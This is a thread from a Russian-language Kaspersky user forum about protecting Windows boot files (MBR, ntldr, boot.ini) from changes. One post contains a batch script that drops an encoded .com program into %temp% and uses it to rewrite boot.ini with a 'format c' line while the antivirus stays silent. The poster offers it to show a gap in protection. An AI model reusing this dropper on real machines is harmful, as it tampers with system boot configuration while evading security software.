Перейти к содержанию

Защита загрузочной области

sandkey

Автор sandkey
в Помощь по персональным продуктам

 Поделиться

Рекомендуемые сообщения

sandkey

sandkey

Опубликовано
Опубликовано

Собственно как защитить?. Интересует MBR, ntldr(bootmgr), boot.ini

Paddington

Paddington

Опубликовано
Опубликовано
Уникальные технологии и разработки «Лаборатории Касперского» защищают вас от современных интернет-угроз:

 

Вирусов, троянских программ, червей и других вредоносных, шпионских и рекламных программ

Руткитов, буткитов и других сложных угроз

Кражи личных данных с применением клавиатурных шпионов, программ, делающих снимки экрана, и фишинговых схем

Ботнетов и других незаконных способов перехвата управления вашим компьютером

Новейших видов атак, а также вновь возникающих и неизвестных угроз

Заражений методом drive-by загрузки, сетевых атак и вторжений

Нежелательного веб-контента и спама

Думаю, дополнительно ничего делать не нужно.
apq

apq

Опубликовано
Опубликовано
Собственно как защитить?. Интересует MBR, ntldr(bootmgr), boot.ini

содержать в актуальном состоянии базы и модули продукта :lol:

Skarbovoy

Skarbovoy

Опубликовано
Опубликовано
содержать в актуальном состоянии базы и модули продукта :lol:

Согласен. В новом SW, который приходит с базами есть обновляемая "защита" от буткитов.

sandkey

sandkey

Опубликовано
  • Автор
Опубликовано (изменено)
Думаю, дополнительно ничего делать не нужно.
содержать в актуальном состоянии базы и модули продукта

 

Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков.

GRUB я не стал запускать, Но думаю КИС на него не сработает. Спокойно переместил(стер) ntldr. А вот с boot.ini немного усложнил задачу. Воспользовался довольно известным кодом замены строк(в данном примере код изменен):

@echo off

:: Create the assembler program, by Herbert Kleebauer

echo hfjkdspj@jzh`0X-`/PPPPPPa(DE(DM(DO(Dh(Ls(Lu(LX(LeZRR]EEEUYRX2Dx=> %temp%.\sbs2.com

echo 0DxFP,0Xx.t0P,=XtGsB4o@$?PIyU!WvX0GwUY Wv;ovBX2Gv0ExGIuht6>> %temp%.\sbs2.com

echo ?@}IKuNWpe~Fpe?FNHlF?wGMECIQqo{Ox{T?kPv@jeoSeIlRFD@{AyEKj@>> %temp%.\sbs2.com

echo iqe~1NeAyR?mHAG~BGRgB{~H?o~TsdgCYqe?HR~upkpBG?~slJBCyA?@xA>> %temp%.\sbs2.com

echo LZp{xq`Cs?H[C_vHDyB?Hos@QslFA@wQ~~x}viH}`LYNBGyA?@xAB?sUq`>> %temp%.\sbs2.com

echo LRy@PwtCYQEuFK@A~BxPtDss@fFqjVmzD@qBEOEenU?`eHHeBCMs?FExep>> %temp%.\sbs2.com

echo LHsPBGyA?@xAunjzA}EKNs@CA?wQpQpKLBHv?s`WJ`LRCYyIWMJaejCksl>> %temp%.\sbs2.com

echo H[GyFGhHBwHZjjHeoFasuFUJeHeB?OsQH[xeHCPvqFj@oq@eNc?~}Nu?O>> %temp%.\sbs2.com

echo ~oEwoAjBKs?Zp`LBzHQzyEFrAWAG{EFrAqAGYwHTECIQ{coKIsaCsf{Oe~>> %temp%.\sbs2.com

echo CK}Ayre~CNFA{rAyEKFACrA{EKGAjbA}eKGSjNMtQFtc{OAyDGFj?{FDGQ>> %temp%.\sbs2.com

echo KAjNVk_OCAx@e?f{o?CosI}1EGizhljJ~H1ZeG}JBA~rACBMDGjjDG@g0>> %temp%.\sbs2.com

:: Use the program

%temp%.\sbs2.com 0 "[boot loader]" "format c" < с:\boot.ini > с:\boot.in

:: Delete the program

del %temp%.\sbs2.com

boot.ini соответственно изменен и КИС молчит. Почему и спрашиваю о возможности защиты.

 

PS кто мешает злоумышленнику прислать этот батник пользователю(((

Изменено пользователем sandkey
Skarbovoy

Skarbovoy

Опубликовано
Опубликовано

sandkey

Можно оригинал в ЛС? Посмотрю на виртуалке.

Drru

Drru

Опубликовано
Опубликовано
Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков.

GRUB я не стал запускать, Но думаю КИС на него не сработает. Спокойно переместил(стер) ntldr. А вот с boot.ini немного усложнил задачу. Воспользовался довольно известным кодом замены строк(в данном примере код изменен):

................................................................................

..................

boot.ini соответственно изменен и КИС молчит. Почему и спрашиваю о возможности защиты.

 

PS кто мешает злоумышленнику прислать этот батник пользователю(((

1. Включен автоматический режим или интерактивный?

2. Если включить интерактивный и руками перенести этот батник в слабые ограничения, KIS промолчит?

apq

apq

Опубликовано
Опубликовано
Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков.

думаю, что это решается на уровне пользовательских учетных записей.

GRUB я не стал запускать, Но думаю КИС на него не сработает.

груб работает до загрузки ОС, так что никакой антивирус, не может на него сработать по умолчанию.

кто мешает злоумышленнику прислать этот батник пользователю

а зачем запускать все подряд батники? вообще обычный юзер нынче пользуется батниками? сомнительно

sandkey

sandkey

Опубликовано
  • Автор
Опубликовано (изменено)
1. Включен автоматический режим или интерактивный?

2. Если включить интерактивный и руками перенести этот батник в слабые ограничения, KIS промолчит?

Был включен автомат. Переключил в интерактив, батник в слабые ограничения сам встал, хм, а вот создаваемого батником ком-файла ни в контроле программ ни в отчете нигде нет. КИС молчит.

груб работает до загрузки ОС

Я имел ввиду запуск инсталятора груба для его установки при запущенном каспере.

вообще обычный юзер нынче пользуется батниками?
о

Ну в данном случае батник создает ком файл на ассемблере(есно без цифровой подписи) и он спокойно запускается

Изменено пользователем sandkey
Drru

Drru

Опубликовано
Опубликовано (изменено)
Ну в данном случае батник создает ком файл на ассемблере(есно без цифровой подписи) и он спокойно запускается

Я у себя обычно (не сейчас) ставлю запрос на запуск всех программ не попавших в доверенные. Для меня этого достаточно.

А если прикрутить "костыль", как написано в сообщении №10?

Хотя, гораздо проще сидеть с ограниченными правами, впрочем - это на любителя.

Изменено пользователем Drru
sandkey

sandkey

Опубликовано
  • Автор
Опубликовано
А если прикрутить "костыль", как написано в сообщении №10?

Ага, спасибо читаю как раз эту ветку.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем
×
×
  • Создать...